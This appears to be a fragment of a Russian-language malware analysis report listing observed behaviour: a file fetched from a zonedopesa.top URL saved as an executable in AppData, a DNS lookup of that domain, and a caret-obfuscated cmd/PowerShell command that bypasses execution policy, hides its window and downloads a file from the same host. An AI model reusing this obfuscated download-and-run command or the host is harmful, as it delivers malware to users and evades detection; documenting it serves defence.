Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWers^HelL.ExE -EXeCUTiO^NP^O^l^icY ^By^p^a^ss -^n^o^p^roFI^l^E -WiN^Dow^s^tY^le^ ^H^iD^DEn^ ^(^n^e^w-^Ob^J^e^Ct^ s^y^ST^eM^.N^E^T.WE^bClienT^).dOwNL^Oa^DFi^LE('http://www.zo...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "POWers^HelL.ExE -EXeCUTiO^NP^O^l^icY ^By^p^a^ss -^n^o^p^roFI^l^E -WiN^Dow^s^tY^le^ ^H^iD^DEn^ ^(^n^e^w-^Ob^J^e^Ct^ s^y^ST^eM^.N^E^T.WE^bClienT^).dOwNL^Oa^DFi^LE('http://www.zo...' (со скрытым окном)